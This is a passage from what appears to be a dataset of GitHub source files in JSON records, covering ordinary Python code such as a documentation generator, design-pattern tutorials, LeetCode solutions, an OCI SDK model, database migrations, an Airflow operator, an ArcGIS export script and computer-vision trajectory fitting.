elif isinstance(list(collection)[0], str):\n key = lambda x: SchemaObjects.get(x).name\n else:\n raise TypeError(type(collection[0]))\n return sorted(collection, key=key)\n\n def get_regular_properties(self, _type, *args, **kwargs):\n \"\"\"Make table with properties by schema_id\n :param str _type:\n :rtype: str\n \"\"\"\n if not SchemaObjects.contains(_type):\n return _type\n schema = SchemaObjects.get(_type)\n if schema.schema_type == SchemaTypes.DEFINITION and not kwargs.get('definition'):\n return ''\n head = \"\"\".. csv-table::\n :delim: |\n :header: \"Name\", \"Required\", \"Type\", \"Format\", \"Properties\", \"Description\"\n :widths: 20, 10, 15, 15, 30, 25\n\n\"\"\"\n body = []\n if schema.properties:\n for p in schema.properties:\n body.append(' {} | {} | {} | {} | {} | {}'.format(\n p.get('name') or '',\n 'Yes' if p.get('required') else 'No',\n self.get_type_description(p['type'], *args, **kwargs),\n p.get('type_format') or '',\n '{}'.format(p.get('type_properties') or ''),\n p.get('description') or '')\n )\n body.sort()\n return (head + '\\n'.join(body))\n\n def get_type_description(self, _type, suffix='', *args, **kwargs):\n \"\"\" Get description of type\n :param suffix:\n :param str _type:\n :rtype: str\n \"\"\"\n if not SchemaObjects.contains(_type):\n return _type\n schema = SchemaObjects.get(_type)\n if schema.all_of:\n models = ','.join(\n (self.get_type_description(_type, *args, **kwargs) for _type in schema.all_of)\n )\n result = '{}'.format(models.split(',')[0])\n for r in models.split(',')[1:]:\n result += ' extended {}'.format(r)\n elif schema.is_array:\n result = 'array of {}'.format(\n self.get_type_description(schema.item['type'], *args, **kwargs))\n else:\n result = ':ref:`{} <{}{}>`'.format(schema.name, schema.schema_id, suffix)\n return result\n\n def get_additional_properties(self, _type, *args, **kwargs):\n \"\"\"Make head and table with additional properties by schema_id\n :param str _type:\n :rtype: str\n \"\"\"\n if not SchemaObjects.contains(_type):\n return _type\n schema = SchemaObjects.get(_type)\n body = []\n for sch in schema.nested_schemas: # complex types\n nested_schema = SchemaObjects.get(sch)\n if not (nested_schema or isinstance(nested_schema, SchemaMapWrapper)):\n continue\n\n body.append('Map of {{\"key\":\"{}\"}}\\n\\n'.format(self.get_type_description(\n nested_schema.schema_id, *args, **kwargs)) # head\n )\n if nested_schema.is_array: # table\n _schema = SchemaObjects.get(nested_schema.item.get('type'))\n if _schema and _schema.schema_type == SchemaTypes.INLINE:\n body.append(self.get_regular_properties(_schema.schema_id, *args, **kwargs))\n else:\n body.append(self.get_regular_properties(nested_schema.schema_id, *args, **kwargs))\n if schema.type_format: # basic types, only head\n body.append(\n 'Map of {{\"key\":\"{}\"}}'.format(self.get_type_description(schema.type_format, *args, **kwargs)))\n return ''.join(body)\n\n\ndef header(value, header_value):\n return u'{}\\n{}'.format(value, HEADERS[header_value] * len(value))\n\n\ndef md2rst(obj):\n if WITH_PANDOC:\n return pypandoc.convert(obj, to='rst', format='markdown')\n else:\n return obj.replace('```', '\\n')\n\n\ndef json_dumps(obj, **kwargs):\n return dumps(obj, sort_keys=True, indent=kwargs.get('indent'))\n","repo_name":"Arello-Mobile/swagger2rst","sub_path":"swg2rst/utils/rst.py","file_name":"rst.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"1897989966","text":"\"\"\"\nWhen it's easier to copy an existing object to fully initialize a new one\nPrototype - a partially or fully initialized object that you copy (clone) and make use of.\n\nIdea is that we have existing design, we got a copy of this design, customize and use\n- partially constructed\n- fully constructed\n\"\"\"\nimport copy\n\n\nclass Address:\n def __init__(self, street_address, city, country):\n self.country = country\n self.city = city\n self.street_address = street_address\n\n def __str__(self):\n return f'{self.street_address}, {self.city}, {self.country}'\n\n\nclass Person:\n def __init__(self, name, address):\n self.name = name\n self.address = address\n\n def __str__(self):\n return f'{self.name} lives at {self.address}'\n\n\n# john = Person('John', Address('123 Road', 'London', 'UK'))\n# print(john)\n# create new person who lives in the same place\n# jane = john # make copy BUT it's a reference assigment so 2 var are points at the same object\n# jane.name = 'Jane' # customize\n# # but this will not going to work\n# print(john)\n# print(jane)\n# Cause they referred to the same object\n# Jane lives at 123 Road, London, UK\n# Jane lives at 123 Road, London, UK\n\n# also we can try doing it this way BUT when changing address as it still the same object it will change in 2 objects\n\naddress = Address('123 Road', 'London', 'UK')\njohn = Person('John', address)\njane = Person('Jane', address)\njane.address.street_address = \"123B Road\"\nprint(john, \" : \", hex(id(john.address))) # 123B Road\nprint(jane, \" : \", hex(id(john.address))) # 123B Road\n# AND THIS IS HAPPENS CAUSE Person object keeps the refference to the Adress. So when we\n# jane.address.street_address = \"123B Road\" modifying adress object. We modify the source so for john it also\n# changes\n\n# John lives at 123B Road, London, UK\n# Jane lives at 123B Road, London, UK\n# AND this is happening cause both objects are refer to the same address object (keep reference)\n# and when reference is modified it modifies everywhere\nprint(\"-----\")\n\n# and this should be done using deep copy.\n# It's performs a recursive copy of all of the attributes of an object\njohn = Person('John', Address('123 Road', 'London', 'UK'))\nprint(hex(id(john.address))) # 0x2a908939fd0\njane = copy.deepcopy(john) # now it's separate object not in any way referring to john\nprint(hex(id(jane.address))) # 0x2a908939a60\n\n# jane = copy.copy(john) # Shallow copy so any obj that is reference just gets copied as a reference\n# so jane refers to the same address as John\n# will change name correctly BUT address for both\njane.name = 'Jane'\njane.address.street_address = '123B Road'\nprint(john, jane, sep=\"\\n\")\n# print(jane)\n\na = 1\nprint(hex(id(a))) # 0x21c32be6930\na += 1\nprint(hex(id(a))) # 0x21c32be6950 Потому что после операции += у нас создался совершенно новый инт.\n# ВСЁ ПОТОМУ ЧТО int - immutable\n","repo_name":"fif911/desing_patterns","sub_path":"4. Prototype/1. Prototype.py","file_name":"1. Prototype.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36526104505","text":"from functools import lru_cache\nfrom typing import List\n\nclass Solution(object):\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates = sorted(candidates)\n\n def _function(candidates, target):\n results = []\n\n if target in candidates:\n results.append([target,])\n\n for index, item in enumerate(candidates):\n for result in _function(candidates[:index] + candidates[index + 1:], target - item):\n if item > result[0]:\n continue\n results.append([item] + result)\n\n return results\n return _function(candidates, target)\n\nimport pytest\n\n@pytest.mark.parametrize(\n 'candidates, target, expected_result', [\n (\n [10,1,2,7,6,1,5], 8, [[1,1,6],[1,2,5],[1,7],[2,6]]\n ),\n (\n [2,5,2,1,2], 5, [[1,2,2], [5]]\n ),\n # (\n # [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], 27, []\n # ),\n ]\n)\ndef test(candidates, target, expected_result):\n print(Solution().combinationSum2(candidates, target))\n # assert Solution().combinationSum2(candidates, target) == expected_result\n","repo_name":"zqmillet/leetcode","sub_path":"chapters/combination_sum_ii/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23364163159","text":"import base_conversion as bc\n\n# Example 1:\n# If we want to convert a number in any base to decimal we use convert_base_to_dec\n# In this case we want to convert the hexadecimal number 'F4A' to decimal\nchars_base16 = \"0123456789ABCDEF\"\nanswer1 = bc.convert_base_to_dec(\"F4A\", chars_base16)\nprint(\"F4A in hexadecimal is \" + str(answer1) + \" in decimal\")\n\n# Example 2:\n# If we want to convert a decimal number to another base we use convert_dec_to_base\n# In this case we want to convert the number 180 to base 5\nchars_base5 = \"01234\"\nanswer2 = bc.convert_dec_to_base(180, chars_base5)\nprint(\"180 in decimal is \" + str(answer2) + \" in base 5\")\n\n# Example 3:\n# We want to convert the octal(base 8) number '7245' to binary(base 2)\nchars_base8 = \"01234567\"\nchars_base2 = \"01\"\nnumber_base8 = \"7245\"\nanswer3 = bc.convert_base_to_base(number_base8, chars_base8, chars_base2)\nprint(\"7245 in base8 is \" + str(answer3) + \" in binary\")\n","repo_name":"marten-voorberg/Base-Conversion","sub_path":"examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31603719059","text":"from .monitored_resource_credential import MonitoredResourceCredential\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass EncryptedCredentials(MonitoredResourceCredential):\n \"\"\"\n Encrypted credentials [indicated by the type property in CredentialStore].\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new EncryptedCredentials object with values from keyword arguments. The default value of the :py:attr:`~oci.stack_monitoring.models.EncryptedCredentials.credential_type` attribute\n of this class is ``ENCRYPTED`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param source:\n The value to assign to the source property of this EncryptedCredentials.\n :type source: str\n\n :param name:\n The value to assign to the name property of this EncryptedCredentials.\n :type name: str\n\n :param type:\n The value to assign to the type property of this EncryptedCredentials.\n :type type: str\n\n :param description:\n The value to assign to the description property of this EncryptedCredentials.\n :type description: str\n\n :param credential_type:\n The value to assign to the credential_type property of this EncryptedCredentials.\n Allowed values for this property are: \"EXISTING\", \"PLAINTEXT\", \"ENCRYPTED\"\n :type credential_type: str\n\n :param key_id:\n The value to assign to the key_id property of this EncryptedCredentials.\n :type key_id: str\n\n :param properties:\n The value to assign to the properties property of this EncryptedCredentials.\n :type properties: list[oci.stack_monitoring.models.CredentialProperty]\n\n \"\"\"\n self.swagger_types = {\n 'source': 'str',\n 'name': 'str',\n 'type': 'str',\n 'description': 'str',\n 'credential_type': 'str',\n 'key_id': 'str',\n 'properties': 'list[CredentialProperty]'\n }\n\n self.attribute_map = {\n 'source': 'source',\n 'name': 'name',\n 'type': 'type',\n 'description': 'description',\n 'credential_type': 'credentialType',\n 'key_id': 'keyId',\n 'properties': 'properties'\n }\n\n self._source = None\n self._name = None\n self._type = None\n self._description = None\n self._credential_type = None\n self._key_id = None\n self._properties = None\n self._credential_type = 'ENCRYPTED'\n\n @property\n def key_id(self):\n \"\"\"\n **[Required]** Gets the key_id of this EncryptedCredentials.\n The master key should be created in OCI Vault owned by the client of this API.\n The user should have permission to access the vault key.\n\n\n :return: The key_id of this EncryptedCredentials.\n :rtype: str\n \"\"\"\n return self._key_id\n\n @key_id.setter\n def key_id(self, key_id):\n \"\"\"\n Sets the key_id of this EncryptedCredentials.\n The master key should be created in OCI Vault owned by the client of this API.\n The user should have permission to access the vault key.\n\n\n :param key_id: The key_id of this EncryptedCredentials.\n :type: str\n \"\"\"\n self._key_id = key_id\n\n @property\n def properties(self):\n \"\"\"\n **[Required]** Gets the properties of this EncryptedCredentials.\n The credential properties list. Credential property values will be encrypted format.\n\n\n :return: The properties of this EncryptedCredentials.\n :rtype: list[oci.stack_monitoring.models.CredentialProperty]\n \"\"\"\n return self._properties\n\n @properties.setter\n def properties(self, properties):\n \"\"\"\n Sets the properties of this EncryptedCredentials.\n The credential properties list. Credential property values will be encrypted format.\n\n\n :param properties: The properties of this EncryptedCredentials.\n :type: list[oci.stack_monitoring.models.CredentialProperty]\n \"\"\"\n self._properties = properties\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/stack_monitoring/models/encrypted_credentials.py","file_name":"encrypted_credentials.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"12649075221","text":"\"\"\" Create table Category\n\nRevision ID: 4ddbd7d83e6a\nRevises: 1b9a20f9a38f\nCreate Date: 2015-01-16 16:15:26.335065\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '4ddbd7d83e6a'\ndown_revision = '1b9a20f9a38f'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('category',\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', postgresql.UUID(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('is_visible', sa.Boolean(), nullable=False),\n sa.Column('client_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['client_id'], [u'client.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name', 'client_id', name='category_name_client_id_key')\n )\n op.add_column('cause', sa.Column('category_id', postgresql.UUID(), nullable=True))\n\n connection = op.get_bind()\n connection.execute('insert into category (id, name, created_at, client_id, is_visible) '\n 'select distinct on (category) id, category, created_at, client_id, \\'True\\' '\n 'from cause where category is not null')\n connection.execute('update cause ca set category_id=c.id from category c where ca.category=c.name')\n\n op.drop_column('cause', 'category')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('cause', sa.Column('category', sa.Text(), nullable=True))\n connection = op.get_bind()\n connection.execute('update cause c set category=cn.name from category cn '\n 'where c.category_id=cn.id and c.category_id is not null')\n\n op.drop_column('cause', 'category_id')\n op.drop_table('category')\n ### end Alembic commands ###\n","repo_name":"dvdn/Chaos","sub_path":"migrations/versions/4ddbd7d83e6a_.py","file_name":"4ddbd7d83e6a_.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4805882746","text":"#!/usr/bin/python3\ndef weight_average(my_list=[]):\n if not my_list:\n return 0\n score = 0\n weight = 0\n for a in my_list:\n score += a[0] * a[1]\n weight += a[1]\n return score / weight\n","repo_name":"Shakir-ahmed1/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/100-weight_average.py","file_name":"100-weight_average.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40146263468","text":"from robot_control import Robot, commands\nfrom robot_map import RobotMap\nfrom vision import aruco_init, detect\nfrom ledik import *\nfrom comm import data_comm\n\nimport cv2\nimport time\nimport asyncio\n\nclass main_program:\n def __init__(self):\n self.run = False\n\n def main(self, sock_instance):\n #variables\n n_objects_glob = 0\n start_objects_glob = 0\n start_time = int(time.time())\n buf = []\n i = 0\n\n print(\"testing\")\n robot = Robot()\n ep_led = robot.led\n robot.camera_init()\n robot.wall_init(1,600)\n detector = aruco_init()\n\n while True:\n img = robot.get_frame()\n self.n_objects, ids, img_detect = detect(img, detector)\n\n if i == 0: #run only once\n start_objects_glob = self.n_objects\n i += 1\n\n # if n_objects:\n # print(\"sus\")\n # print(asyncio.run(robot.send_cmd(\"led control comp all r 255 g 0 b 0 effect blink\")))\n if self.n_objects != n_objects_glob:\n async def test(n_objects, rozdil):\n await asyncio.sleep(1)\n if self.n_objects == n_objects:\n if rozdil<0:\n print(\"redbull gambit!\")\n sock_instance.emit(\"message\", \"Ztratil se 1 Redbull, lokace byla zaznamenána na mapě\")\n elif rozdil>0:\n print(\"někdo přidal redbulla?\")\n sock_instance.emit(\"message\", \"Někdo k vaší objednávce přidal 1 redbulla zadarmo :)\")\n asyncio.run(test(self.n_objects,self.n_objects-n_objects_glob))\n\n #validate buffer\n # buf.append(-1)\n # #sock_server.set_data(\"object_lost\")\n\n # if 1 in buf and -1 not in buf:\n # print(\"někdo přidal redbulla?\")\n # sock_instance.emit(\"message\", \"Někdo k vaší objednávce přidal 1 redbulla zadarmo :)\")\n # buf.pop(buf.index(1))\n # #buf = []\n\n # if -1 in buf and 1 not in buf: \n # print(\"redbull gambit!\")\n # sock_instance.emit(\"message\", \"Ztratil se 1 Redbull, lokace byla zaznamenána na mapě\")\n # buf.pop(buf.index(-1))\n # #buf = []\n\n n_objects_glob = self.n_objects\n battery_status = robot.battery_level\n\n #put data into queue\n data_comm.put_data(self.n_objects, start_time, start_objects_glob, battery_status)\n if self.run:\n robot.follow_wall(-100) #wall following\n #transform commands into map\n \n\n ret, buffer = cv2.imencode('.jpg', img_detect)\n frame = buffer.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n def main_map(self):\n robotmap = RobotMap()\n while True:\n robotmap.draw_interest_point(320, 320)\n robotmap.upload_commands(commands)\n frame = robotmap.get_map()\n ret, buffer = cv2.imencode('.jpg', frame)\n frame = buffer.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n#if __name__ == \"__main__\":\n# main()","repo_name":"Plajta/RobotControl","sub_path":"src/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1104687541","text":"from __future__ import print_function\nimport arcrest\nfrom arcrest.security import AGOLTokenSecurityHandler\nfrom arcrest.agol import FeatureLayer\nimport csv\nimport datetime\nimport os\nimport arcresthelper\nfrom arcresthelper import common\n\ndef validate(date_text,dateTimeFormat):\n try:\n datetime.datetime.strptime(date_text, dateTimeFormat)\n return True\n except ValueError:\n return False\ndef trace():\n \"\"\"\n trace finds the line, the filename\n and error message and returns it\n to the user\n \"\"\"\n import traceback, inspect\n tb = sys.exc_info()[2]\n tbinfo = traceback.format_tb(tb)[0]\n filename = inspect.getfile(inspect.currentframe())\n # script name + line number\n line = tbinfo.split(\", \")[1]\n # Get Python syntax error\n #\n synerror = traceback.format_exc().splitlines()[-1]\n return line, filename, synerror\n\ndef main():\n try:\n dateTimeFormat = \"%Y/%m/%d %H:%M:%S\"#Date time format of the service, example'2016-04-26 04:00:00'\n #log file to store details\n logFile = r\"c:\\temp\\adoptedAssets.log\"\n common.init_log(logFile)\n print (\"###### Date Extraction Process Started ######\")\n username = \"\"\n password = \"\"\n proxy_port = None\n proxy_url = None\n agolSH = None\n print (\"\\tStarted at {0}\".format(datetime.datetime.now().strftime(dateTimeFormat)))\n #Create a authenicated connection to portal\n if username != \"\":\n agolSH = AGOLTokenSecurityHandler(username=username,\n password=password)\n print (\"\\tLogged into the portal\")\n \n #Settings\n url = 'http://services1.arcgis.com/DlnuvLGpDczjeSgG/arcgis/rest/services/CatchBasin/FeatureServer/0/' #URL to adoption service\n statusField = 'Assetstatus' #Field with status, used to build SQL\n statusValue = 'Adopted' #Value to search for in the StatusField\n statusUpdateField = 'Laststatusupdate' #Field used to restrict query to only records since last query\n out_fields ='OBJECTID,GIS_ID,Nickname' #Fields to save to the output CSV\n \n #The location and file name to save the results to\n saveLocation = r\"c:\\temp\\adoptedAssets.csv\"\n #File with the date of the last run, if it does not exist, all features are returned and file is created for next run\n lastRunDetails = r\"c:\\temp\\lastrundate.txt\"\n \n lastQueryDate = None\n #Start building the SQL Query\n sql = statusField + \" = '\" + statusValue + \"'\"\n #Open the file with the last run date\n if os.path.isfile(lastRunDetails):\n print(\"\\tLast run file exist\")\n with open(lastRunDetails, 'r') as configFile:\n lastQueryDate = configFile.read()\n configFile.close()\n print(\"\\t\\tLast query date: {0}\".format(lastQueryDate))\n #If the last query date file was found and value is a date\n if lastQueryDate is not None and validate(date_text=lastQueryDate, dateTimeFormat=dateTimeFormat):\n sql = sql + \" AND \" + statusUpdateField + \" >= \" + \"'\" + lastQueryDate + \"'\"\n #Add current time to query\n queryDate = datetime.datetime.now().strftime(dateTimeFormat)\n sql = sql + \" AND \" + statusUpdateField + \" <= \" + \"'\" + queryDate + \"'\"\n print(\"\\tSQL: {0}\".format(sql))\n #Create a connection to the layer\n fl = FeatureLayer(\n url=url,\n securityHandler=agolSH,\n proxy_port=proxy_port,\n proxy_url=proxy_url,\n initialize=True)\n \n #query the layer\n featureSet = fl.query(where=sql,\n out_fields=out_fields,\n returnGeometry=False) \n print(\"\\t{0} feature returned\".format(len(featureSet.features)))\n #Create a new output writer\n if (len(featureSet.features) == 0):\n if os.path.isfile(saveLocation):\n os.remove(saveLocation)\n else:\n with open(saveLocation, \"wb+\") as csvFile:\n f = csv.writer(csvFile)\n fields = []\n #write the headers to the csv\n for field in featureSet.fields:\n fields.append(field['name'])\n f.writerow(fields)\n \n newRow = []\n #Loop through the results and save each to a row\n for feature in featureSet:\n newRow = []\n for field in featureSet.fields:\n newRow.append(feature.get_value(field['name']))\n f.writerow(newRow)\n csvFile.close()\n print(\"\\tCSV updated\")\n #Update the last run file\n with open(lastRunDetails, 'w') as configFile:\n configFile.write(queryDate)\n configFile.close()\n print(\"\\t{0} saved to file\".format(queryDate))\n print (\"\\tCompleted at {0}\".format(datetime.datetime.now().strftime(dateTimeFormat)))\n print (\"###### Completed ######\")\n \n except:\n line, filename, synerror = trace()\n print (\"error on line: %s\" % line)\n print (\"error in file name: %s\" % filename)\n print (\"with error message: %s\" % synerror)\n \nif __name__ == \"__main__\":\n main()","repo_name":"Esri/adopta","sub_path":"Scripts/AssetByStatus.py","file_name":"AssetByStatus.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"20162721354","text":"import statsmodels.formula.api as smf\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\n# scored_y = pd.DataFrame([\n# # {\"t\": 1, \"y\": 1000},\n# {\"t\": 2, \"y\": 725},\n# {\"t\": 3, \"y\": 468},\n# {\"t\": 4, \"y\": 337}\n# ])\n\n# scored_x = pd.DataFrame([\n# # {\"t\": 1, \"x\": 1430},\n# {\"t\": 2, \"x\": 1368},\n# {\"t\": 3, \"x\": 1100},\n# {\"t\": 4, \"x\": 874}\n# ])\n\n# missed_y = pd.DataFrame([\n# {\"t\": 1, \"y\": 711},\n# {\"t\": 2, \"y\": 580},\n# {\"t\": 3, \"y\": 541},\n# {\"t\": 4, \"y\": 562}\n# ])\n\n# missed_x = pd.DataFrame([\n# {\"t\": 1, \"x\": 1331},\n# {\"t\": 2, \"x\": 1118},\n# {\"t\": 3, \"x\": 920},\n# {\"t\": 4, \"x\": 726},\n# ])\n\nframes_scored = [\n # r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\scored\\i_8452_00050.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\scored\\i_8452_00051.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\scored\\i_8452_00052.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\scored\\i_8452_00053.png\"\n]\n\nframes_missed = [\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\missed\\i_8452_00131.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\missed\\i_8452_00132.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\missed\\i_8452_00133.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\missed\\i_8452_00134.png\",\n]\n\nblue_lower = np.array([90, 50, 100], np.uint8)\nblue_upper = np.array([150, 255, 255], np.uint8)\n\npoints_x = []\npoints_y = []\n\nfor i, file_path in enumerate(frames_missed):\n img = cv2.imread(file_path)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n blue_mask = cv2.inRange(hsv, blue_lower, blue_upper)\n contours, _ = cv2.findContours(blue_mask,\n cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n \n for contour in sorted(contours, key = lambda x: cv2.contourArea(x), reverse=True):\n area = cv2.contourArea(contour)\n if(area > 300):\n x, y, _, _ = cv2.boundingRect(contour)\n points_x.append(x)\n points_y.append(y)\n break\n\npoints_y = pd.DataFrame(zip(points_y, list(np.arange(1,4))), columns=[\"y\", \"t\"])\npoints_x = pd.DataFrame(zip(points_x, list(np.arange(1,4))), columns=[\"x\", \"t\"])\n\nm_y = smf.ols(formula=\"y ~ t + np.power(t, 2)\", data=points_y).fit()\nm_x = smf.ols(formula=\"x ~ t\", data=points_x).fit()\nprint(m_y.summary())\nprint(m_x.summary())\n\npred_x = []\npred_y = []\nfor t in range(1, 11):\n y = m_y.params[\"np.power(t, 2)\"]*t**2 + m_y.params[\"t\"]*t + m_y.params[\"Intercept\"]\n x = m_x.params[\"t\"]*t + m_x.params[\"Intercept\"]\n pred_x.append(x)\n pred_y.append(y)\n\nplt.scatter(x=points_x[\"x\"], y=points_y[\"y\"])\nplt.plot(pred_x, pred_y)\nplt.plot([180, 160, 535, 500, 180], [450, 570, 520, 590, 450])\nplt.gca().invert_yaxis()\nplt.show()\nprint()\n","repo_name":"simra/frc_vision","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15247986437","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass LoadFactOperator(BaseOperator):\n\n ui_color = '#F98866'\n \n drop_table_template = \"\"\"\n DROP TABLE IF EXISTS {}\n \"\"\"\n \n fact_table_template = \"\"\"\n CREATE TABLE {} AS\n {}\n \"\"\"\n \n\n @apply_defaults\n def __init__(self, redshift_conn_id=\"\", table=\"\", sql_query =\"\",\n *args, **kwargs):\n\n super(LoadFactOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.table = table\n self.sql_query = sql_query\n\n def execute(self, context):\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n drop_sql = LoadFactOperator.drop_table_template.format(self.table)\n redshift.run(drop_sql)\n fact_sql = LoadFactOperator.fact_table_template.format(self.table, self.sql_query)\n redshift.run(fact_sql)\n self.log.info('LoadFactOperator executed')","repo_name":"thanhvie/de_udacity_project5","sub_path":"plugins/operators/load_fact.py","file_name":"load_fact.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70082143846","text":"import pandas as pd\n\ntaxa = 5.60\n\nautomovel = pd.read_csv('automovel.csv', sep=';')#\nprint('\\n',automovel.tail(8)) \n\nconvertido = list(automovel['preco'])\npreco_r = []\nfor i in range(len(convertido)):\n preco_r.append(convertido[i] * taxa)\n\nprint(\"Preços convertidos\"+str(preco_r))\n\nautomovel['preco real'] = pd.Series(preco_r)\nprint (automovel)\n\n\nkpl = []\nmpl = list(automovel['consumo'])\nfor j in range(len(mpl)):\n kpl.append(mpl[j] / 0.425143707)\n\nautomovel['consumo'] = pd.Series(kpl)\nprint (automovel)","repo_name":"LucasSargeir/Estudo","sub_path":"Python/Pandas/exemplo_2.py","file_name":"exemplo_2.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37880640466","text":"from math import isnan\r\nfrom typing import Dict, Any, List, Tuple\r\n\r\nimport numpy as np\r\nfrom osgeo import gdal\r\n\r\nfrom enmapbox.typeguard import typechecked\r\nfrom enmapboxprocessing.algorithm.writeenviheaderalgorithm import WriteEnviHeaderAlgorithm\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.rasterreader import RasterReader\r\nfrom enmapboxprocessing.rasterwriter import RasterWriter\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import (QgsProcessingContext, QgsProcessingFeedback, QgsRectangle, QgsRasterLayer,\r\n QgsRasterDataProvider, QgsPoint, QgsPointXY, QgsMapLayer)\r\n\r\n\r\n@typechecked\r\nclass TranslateRasterAlgorithm(EnMAPProcessingAlgorithm):\r\n P_RASTER, _RASTER = 'raster', 'Raster layer'\r\n P_BAND_LIST, _BAND_LIST = 'bandList', 'Selected bands'\r\n P_GRID, _GRID = 'grid', 'Grid'\r\n P_SPECTRAL_RASTER, _SPECTRAL_RASTER = 'spectralSubset', 'Spectral raster layer for band subsetting'\r\n P_SPECTRAL_BAND_LIST, _SPECTRAL_BAND_LIST = 'spectralBandList', 'Selected spectral bands'\r\n P_OFFSET, _OFFSET = 'offset', 'Data offset value'\r\n P_SCALE, _SCALE = 'scale', 'Data gain/scale value'\r\n P_COPY_METADATA, _COPY_METADATA = 'copyMetadata', 'Copy metadata'\r\n P_COPY_STYLE, _COPY_STYLE = 'copyStyle', 'Copy style'\r\n P_EXCLUDE_BAD_BANDS, _EXCLUDE_BAD_BANDS = 'excludeBadBands', 'Exclude bad bands'\r\n P_EXCLUDE_DERIVED_BAD_BANDS, _EXCLUDE_DERIVED_BAD_BANDS = \\\r\n 'excludeDerivedBadBands', 'Derive and exclude additional bad bands'\r\n P_WRITE_ENVI_HEADER, _WRITE_ENVI_HEADER = 'writeEnviHeader', 'Write ENVI header'\r\n P_EXTENT, _EXTENT = 'extent', 'Spatial extent'\r\n P_SOURCE_COLUMNS, _SOURCE_COLUMNS = 'sourceColumns', 'Column subset'\r\n P_SOURCE_ROWS, _SOURCE_ROWS = 'sourceRows', 'Row subset'\r\n P_RESAMPLE_ALG, _RESAMPLE_ALG = 'resampleAlg', 'Resample algorithm'\r\n P_SOURCE_NODATA, _SOURCE_NODATA = 'sourceNoData', 'Source no data value'\r\n P_NODATA, _NODATA = 'noData', 'No data value'\r\n P_UNSET_SOURCE_NODATA, _UNSET_SOURCE_NODATA = 'unsetSourceNoData', 'Unset source no data value'\r\n P_UNSET_NODATA, 